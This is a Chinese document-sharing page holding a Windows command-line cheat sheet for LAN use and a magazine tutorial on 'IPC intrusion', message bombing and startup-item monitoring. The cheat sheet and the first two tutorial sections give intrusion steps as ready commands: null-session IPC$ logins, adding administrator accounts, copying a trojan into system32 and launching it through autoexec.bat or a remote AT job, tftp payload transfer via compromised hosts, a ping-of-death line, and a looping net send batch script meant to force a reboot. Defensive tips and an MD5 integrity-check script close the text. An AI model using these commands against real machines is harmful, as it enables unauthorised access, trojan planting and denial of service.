史上最全的局域网dos命令集.docx
《史上最全的局域网dos命令集.docx》由会员分享,可在线阅读,更多相关《史上最全的局域网dos命令集.docx(12页珍藏版)》请在冰豆网上搜索。
史上最全的局域网dos命令集
史上最全的局域网dos命令集
netuse\\ip\ipc$""/user:
""建立IPC空链接
netuse\\ip\ipc$"密码"/user:
"用户名"建立IPC非空链接
netuseh:
\\ip\c$"密码"/user:
"用户名"直接登陆后映射对方C:
到本地为H:
netuseh:
\\ip\c$登陆后映射对方C:
到本地为H:
netuse\\ip\ipc$/del删除IPC链接
netuseh:
/del删除映射对方到本地的为H:
的映射
netuser用户名密码/add建立用户
netuserguest/active:
yes激活guest用户
netuser查看有哪些用户
netuser帐户名查看帐户的属性
netlocalgroup***istrators用户名/add把“用户”添加到管理员中使其具有管理员权限,注意:
***istrator后加s用复数
netstart查看开启了哪些服务
netstart服务名开启服务;(如:
netstarttelnet,netstartschedule)
netstop服务名停止某服务
nettime\\目标ip查看对方时间
nettime\\目标ip/set设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
netview查看本地局域网内开启了哪些共享
netview\\ip查看对方局域网内开启了哪些共享
netconfig显示系统网络设置
netlogoff断开连接的共享
netpause服务名暂停某服务
netsendip"文本信息"向对方发信息
netver局域网内正在使用的网络连接类型和信息
netshare查看本地开启的共享
netshareipc$开启ipc$共享
netshareipc$/del删除ipc$共享
netsharec$/del删除C:
共享
netuserguest12345用guest用户登陆后用将密码改为12345
netpassword密码更改系统登陆密码
netstat-a查看开启了哪些端口,常用netstat-an
netstat-n查看端口的网络连接情况,常用netstat-an
netstat-v查看正在进行的工作
netstat-p协议名例:
netstat-ptcq/ip查看某协议使用情况(查看tcp/ip协议使用情况)
netstat-s查看正在使用的所有协议使用情况
nbtstat-Aip对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:
参数-A要大写
tracert-参数ip(或计算机名)跟踪路由(数据包),参数:
“-w数字”用于设置超时间隔。
pingip(或域名)向对方主机发送默认大小为32字节的数据,参数:
“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping-t-l65550ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist-t以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill-F进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del-F文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏
、系统、存档以外的文件。
例如“DEL/AR*.*”表示删除当前目录下所有只读文件,“DEL/A-S*.*”表示删除当前目录下除系统文件以外的所有文件
#2二:
del/S/Q目录或用:
rmdir/s/Q目录/S删除目录及目录下的所有子目录和文件。
同时使用参数/Q可取消删除操作时的系统确认就直接删除。
(二个命令作
用相同)
move盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fcone.txttwo.txt>3st.txt对比二个文件并把不同之处输出到3st.txt文件中,">"和">>"是重定向命令
atid号开启已注册的某个计划任务
at/delete停止所有计划任务,用参数/yes则不需要确认就直接停止
atid号/delete停止某个已注册的计划任务
at查看所有的计划任务
at\\iptime程序名(或一个命令)/r在某时间运行对方某程序并重新启动计算机
fingerusername@host查看最近有哪些用户登陆
telnetip端口远和登陆服务器,默认端口为23
openip连接到IP(属telnet登陆后的命令)
telnet在本机上直接键入telnet将进入本机的telnet
copy路径\文件名1路径\文件名2/y复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copyc:
\srv.exe\\ip\***$复制本地c:
\srv.exe到对方的***下
cppy1st.jpg/b+2st.txt/a3st.jpg将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:
2st.txt文件头要空三排,参数:
/b指二进制文件,/a指ASCLL
格式文件
copy\\ip\***$\svv.exec:
\或:
copy\\ip\***$\*.*复制对方***i$共享下的srv.exe文件(所有文件)至本地C:
xcopy要复制的文件或目录树目标地址\目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp-i自己IP(用肉机作跳板时这用肉机IP)getserver.exec:
\server.exe登陆后,将“IP”的server.exe下载到目标主机c:
\server.exe参数:
-i指以二进
制模式传送,如传送exe文件时用,如不加-i则以ASCII模式(传送文本文件模式)进行传送
tftp-i对方IPputc:
\server.exe登陆后,上传本地c:
\server.exe至主机
ftpip端口用于上传文件至服务器或进行文件操作,默认端口为21。
bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
routeprint显示出IP路由,将主要显示网络地址Networkaddres,子网掩码Netmask,网关地址Gatewayaddres,接口地址Interface
arp查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。
arp-a将显示出全部信息
start程序名或命令/max或/min新开一个新窗口并最大化(最小化)运行某程序或命令
mem查看cpu使用情况
attrib文件名(目录名)查看某文件(目录)的属性
attrib文件名-A-R-S-H或+A+R+S+H去掉(添加)某文件的存档,只读,系统,隐藏属性;用+则是添加为某属性
dir查看文件,参数:
/Q显示文件及目录属系统哪个用户,/T:
C显示文件创建时间,/T:
A显示文件上次被访问时间,/T:
W上次被修改时间
date/t、time/t使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set指定环境变量名称=要指派给变量的字符设置环境变量
set显示当前所有的环境变量
setp(或其它字符)显示出当前以字符p(或其它字符)开头的所有环境变量
pause暂停批处理程序,并显示出:
请按任意键继续....
if在批处理程序中执行条件处理(更多说明见if命令及变量)
goto标签将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:
“:
start”标签)
call路径\批处理文件名从批处理程序中调用另一个批处理程序(更多说明见call/?
)
for对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echoon或off打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo信息在屏幕上显示出信息
echo信息>>pass.txt将"信息"保存到pass.txt文件中
findstr"Hello"aa.txt在aa.txt文件中寻找字符串hello
find文件名查找某文件
title标题名字更改CMD窗口标题名字
color颜色值设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=
淡紫、E=淡黄、F=亮白
WindowsXP/2000中提供了一条发送网络消息的命令netsend,使用该命令也可以向局域网/广域网发送一条消息,注意不能跨网段!
命令格式为:
netsend计算机名/IP地址“消息内容”。
例如:
要给IP地址为192.192.192.1的电脑,发送“还有5分钟就下班关闭服务器了”这条消息,可以这样操作:
单击菜单“开始”/程序/附件/命令提示符,键入以下命令:
netsend192.192.192.1"还有5分钟就下班关闭服务器了"
稍等片刻,192.192.192.1电脑桌面上将会弹出一个标题为“信使服务”的窗口,里面显示你发送的消息。
小提示:
假如对方关闭了Messenger服务,这条消息就不会显示了。
如果你不想收到该类消息,也可以点击菜单“开始”/设置/控制面板/管理工具/服务,在服务中关闭“Messenger服务”;如果想启动Messenger服务,你可以在服务中操作。
当然也可以使用以下命令启动或禁止Messenger服务:
netstopMessenger停止Messenger服务;
netstartMessenger 开始Messenger服务
√了解IPC入侵原理并掌握防御方法
√抵抗信使炸弹的攻击
√打造带警报的自启动项防火墙
自从前几次小伙计写了几个精彩的脚本后,就始终有些飘飘然,觉得掌柜的也不过如此,江湖上传言他为顶尖高手原来也只是浪得虚名罢了。
这不?
小伙计大摇大摆地走进了掌柜的办公室,准备提出加薪要求。
可是掌柜的在干嘛呢?
目不转睛地盯着他的19'液晶屏幕并间歇性地进入沉思。
小伙计蹑手蹑脚地绕到了掌柜的背后,顿时被显示器上的内容镇住了——原来掌柜的是一个黑客组织成员。
经过一番软磨硬泡,掌柜的终于同意传授几招。
一、IPC木马之迷
IPC,你可能听过这个名词。
前几年IPC漏洞曾经红极一时,从原先黑客们手工敲入命令行,到后来出现了能在扫描时同步植入木马的高效IPC扫描器。
现在仍有不少人天天开着IPC扫描器在网上寻找“肉鸡”,但究竟IPC入侵是怎么回事呢?
掌柜的拿小伙子的机器(IP:
192.168.0.2,系统:
Windows2000)做起了测试。
注意:
以下代码仅对具有空口令管理员账户的系统有效(netuse命令的使用请参考本刊今年第9期的《连根拔起——共享的二次登录》)。
netuse\\192.168.9.22\ipc$""/user:
"administrator"
这行命令的大意是:
以用户名administrator及空密码登录IP地址为192.168.0.2的机器上的IPC共享,登录了这台机器的IPC共享后就相当于拿到了对它的管理访问权限,那些具有远程参数的命令就有用武之地了(比如本刊今年第10期的《DOS快餐店》中介绍的AT命令)。
netusez:
\\192.168.9.22\c$
这行命令的大意是:
登录IP为192.168.0.2的机器上的共享资源c$,并将这个共享映射为本地盘符Z:
。
“咦?
我明明没开共享啊!
”小伙计惊呼。
掌柜的头也不回便答道:
“难道你不知道Windows的默认共享吗?
”
什么是Windows的默认共享:
在Windows2000/XP等系统中,为了便于管理,默认将各盘符都设置了共享。
共享名与盘符相同,但在最后加了一个“$”隐藏符号,这样在普通情况下就无法从“网上邻居”中浏览到这个共享资源。
而一旦登录了IPC管理共享,就能够轻易添加对这些共享盘符的映射了。
现在小伙计的C盘已经被掌柜的映射为自己的Z盘了,而且访问权限是“完全控制”!
也就是说通过对本地Z盘的操作,就能轻松控制远程主机上的C盘。
“如果是黑客得到了这样的访问权限,那么我想,他现在应该会上传木马了。
”掌柜的如是说。
copyd:
\trojan.exez:
\winnt\system32
这行命令的大意是:
将d:
\下的文件trojan.exe(可能是黑客本地机器上的一个木马程序)复制到z:
\winnt\system32目录(被入侵机器的远程目录)中。
经过这条copy命令,木马文件已经轻松上传到了小伙计的系统目录中。
小伙计还有些不服:
“就算你能把木马放进我的硬盘又怎样,只要我不执行它,你就拿我没折。
”“要运行这个程序,有N种方法。
”掌柜的轻蔑地看了小伙子一眼,冷冷地答道。
①重启后运行:
加入自启动文件
在本地新建一个文本文件并命名为autoexec.bat,在其中加入一行命令“trojan.exe”(不含引号),然后执行以下命令(假设刚才新建的位置在d:
\):
copyd:
\autoexec.batz:
\/y
这行命令的大意是:
用本地目录d:
\下的文件autoexec.bat覆盖远程目录z:
\(即被入侵的机器的C盘根目录)下的同名文件,在启动系统时默认将自动执行autoexec.bat中的命令,那么当小伙计重启系统后,木马就偷偷执行了……
②现在就运行:
远程AT命令
nettime\\192.168.0.2
首先用nettime命令获取远程计算机的系统时间,命令返回结果显示小伙计的系统时间为14:
55,现在可以用AT命令了(AT命令的使用请参考上期《DOS快餐店》)。
at\\192.168.0.215:
00trojan.exe
这样到了15:
00时,远程计算机上就自动执行了trojan.exe。
小提示
在以上的命令中使用“trojan.exe”而非“c:
\winnt\system32\trojan.exe”是由于该文件在系统目录(即system32)下,如果没有全路径,则系统会首先从系统目录下寻找符合名称要求的文件。
如何防范IPC攻击
1.安装网络防火墙,并为Administrator用户设置一个较复杂的超过8位的密码。
2.使用本刊今年第9期中的《用好Windows权限之剑——严防非法入侵》中介绍的方法给CMD设置权限。
二、疯狂的信使消息炸弹
新装完系统之后,很多用户都会报怨为什么会弹出信使服务的窗口(在CFan的论坛上就经常会有读者提这个问题)。
信使服务原来是微软设计用来帮助用户及时传递重要消息的工具,可是现在却被很多人用来传递广告,在命令行提示符下输入“netsendIP地址要发送的消息”命令即可。
想不想当一回“黑客”,来和朋友开个小玩笑呢?
将下面的脚本保存为BAT文件(如:
sendmsg.bat):
@echo正在攻击中
:
start
@netsend%1%2
@iferrorlevel1gotoover
gotostart
:
over
@echo发送失败
这样,只需执行“sendmsg.batIP地址要发送的消息”,就会自动向指定的IP循环发送消息,直到对方因窗口过多而被迫重启。
这段脚本的大意是:
脚本开始时显示“正在攻击中”利用netsend命令将第二个参数所包含的内容作为消息发送到第一个参数所指定的计算机上。
如果netsend命令执行不成功(比如远程主机不存在,或者未打开这项服务),则脚本会跳转到over标号处,显示“发送失败”并退出脚本。
而如果发送成功的话,则跳转到start标号,start标签在netsend命令前,所以发送成功之后就会又重新发送,形成了循环发送。
如何防范信使消息炸弹
1.安装具有过滤信使消息的防火墙。
2.运行services.msc,在弹出的服务窗口右侧列表中双击Messenger服务,点击“停止”按钮并将“启动类型”设置为“禁用”。
三、启动项被更改时,请通知我
小伙计还在检查刚才被掌柜的入侵的自启动项:
“黑客都这样神不知鬼不觉地入侵,那我该如何防御呢?
”掌柜的不慌不忙地拿出了收藏的利器——MD5检测工具(以下的脚本中需要用到此工具,可从
什么是MD5:
MD5的全称是Message-DigestAlgorithm5(信息-摘要算法),它能将一串随机长度的信息(当然也包括文件)通过其加密函数算法生成一个惟一的128位值,相同信息的MD5值也是相同的,反之,文件即使略有改动,其MD5值也会产生变化。
因此,只需比较文件的MD5值,就能知道文件是否经过改动了。
1.给自启动项生成MD5“身份证”
将以下脚本保存为run.bat,和刚才下载的md5.exe(从md5.zip中解压缩得到)放在同一目录下。
每次执行都将生成autoexec.bat文件的MD5文件ate.md5和注册表自启动项的MD5文件run.md5(autoexec.bat文件的路径可根据实际系统所在盘符进行修改,一般为默认的c:
\)。
@echooff
md5.exec:
\autoexec.bat>c:
\ate.md5
regedit.exe/ec:
\run.regHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
md5.exec:
\run.reg>c:
\run.md5
脚本讲解:
用md5.exe生成c:
\autoexec.bat文件的MD5值,并写入c:
\ate.md5中。
导出注册表分支[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]为c:
\run.reg,再以md5.exe计算出该文件的MD5值并写入c:
\run.md5中。
2.查验自启动项的MD5“身份证”
将以下脚本保存为check.bat,和md5.exe放在同一目录下。
@echooff
md5.exec:
\autoexec.bat>c:
\ate2.md5
regedit.exe/ec:
\run.regHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
md5.exec:
\run.reg>c:
\run2.md5
fcc:
\ate.md5c:
\ate2.md5>nul
iferrorlevel1@echoMsgbox"autoexec.bat文件经过改动!
",vbInformation,"黑客警报">c:
\warn.vbs
ifexistc:
\warn.vbsc:
\warn.vbs
delc:
\warn.vbs
fcc:
\run.md5c:
\run2.md5>nul
iferrorlevel1@echoMsgbox"注册表自启动项经过改动!
",vbInformation,"黑客警报">c:
\warn.vbs
ifexistc:
\warn.vbsc:
\warn.vbs
delc:
\warn.vbs
脚本讲解:
用md5.exe生成c:
\autoexec.bat文件的MD5值,并写入c:
\ate2.md5中。
导出注册表分支[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]为c:
\run.reg,再以md5.exe计算出该文件的MD5值并写入c:
\run2.md5中。
然后用fc命令比较c:
\ate.md5(以前的autorun.bat的MD5文件)和c:
\ate2.md5(现在的autorun.bat的MD5文件)。
如果发现MD5值发生了变化(即两个MD5文件不一致),下方的“iferrorlevel1”语句就会执行其右侧的命令了,右侧的“@echoMsgbox"注册表自启动项经过改动!
",vbInformation,"黑客警报">c:
\warn.vbs”是将“Msgbox"注册表自启动项经过改动!
",vbInformation,"黑客警报"”这行语句写入文件c:
\warn.vbs中,如果写入成功(文件存在)就执行。
再用fc命令比较c:
\run.md5c:
\run2.md5,如果发现MD5变化,即文件改动就将“Msgbox"注册表自启动项经过改动!
",vbInformation,"黑客警报"”写入到文件c:
\warn.vbs中,写入成功就执行。
这行VBS脚本的功能是弹出一个对话框,并显示指定的文字(见图1)。
在弹出框被关闭后,就删除这个VBS文件。
*fc命令的详细使用方法将在今后的《DOS快餐店》中进行讲解。
脚本使用:
将check.bat加入注册表自启动项中(也可是其他启动方式),双击run.bat进行MD5文件的初始化(以后每次进行合法的自启动项修改时,都要重新运行这个脚本一次),重新启动后即开始检查。